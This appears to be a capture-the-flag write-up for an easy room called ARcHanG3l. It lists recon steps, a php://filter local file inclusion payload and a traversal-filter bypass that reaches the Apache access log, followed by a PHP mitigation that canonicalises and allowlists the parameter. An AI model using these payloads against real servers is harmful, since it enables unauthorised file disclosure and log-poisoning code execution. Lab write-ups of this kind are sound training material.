# ARcHanG3l

Difficulty: Easy
[!bug] Apache Log Poisoning
- the page header on the target IP reveals a new domain: "Send us a mail: support@mafialive.thm"
- add it to `/etc/hosts` and get a flag
- `http://mafialive.thm/FUZZ` -> `robots.txt` with: `Disallow: /test.php`
- use a PHP wrapper filter for source code disclosure: `/test.php?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/test.php`
- bypass the non-recursive path traversal filter `if(!containsStr($_GET['view'], '../..'))` -> `/.././.././.././log/apache2/access.log`
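As an added mitigation example (not code from the room or from these notes): the `view` parameter above is guarded only by a substring blacklist on `../..`, which a canonicalise-then-allowlist check replaces. The base directory is taken from the notes; `resolveView` and the strict file-name pattern are my own assumptions.

```php
<?php
// Added example, not the room's code: a safer replacement for the
// non-recursive "../.." substring check. Substring blacklists can be
// bypassed; instead, canonicalise the path and allowlist the result.
declare(strict_types=1);

// Directory named in the notes' php://filter payload.
const VIEW_BASE = '/var/www/html/development_testing';

/**
 * Resolve a user-supplied view name to a file inside VIEW_BASE, or return
 * null. Rejects stream wrappers (php://, data://, ...) and any traversal,
 * because realpath() canonicalises the path before the prefix check.
 */
function resolveView(string $view): ?string
{
    // A scheme prefix selects a PHP stream wrapper, never a local view.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $view)) {
        return null;
    }
    // Only plain file names are accepted: no separators, no dot segments.
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $view)) {
        return null;
    }
    $base = realpath(VIEW_BASE);
    $full = realpath(VIEW_BASE . '/' . $view);
    if ($base === false || $full === false) {
        return null;
    }
    // Defence in depth: the canonical path (symlinks resolved) must still
    // sit under the base directory.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

$target = resolveView((string)($_GET['view'] ?? ''));
if ($target === null) {
    http_response_code(400);
    exit('Invalid view');
}
include $target;
```

With this check in place, `view=php://filter/...` and any `../` variant are rejected before `include` runs, so the log file can no longer be reached through this parameter.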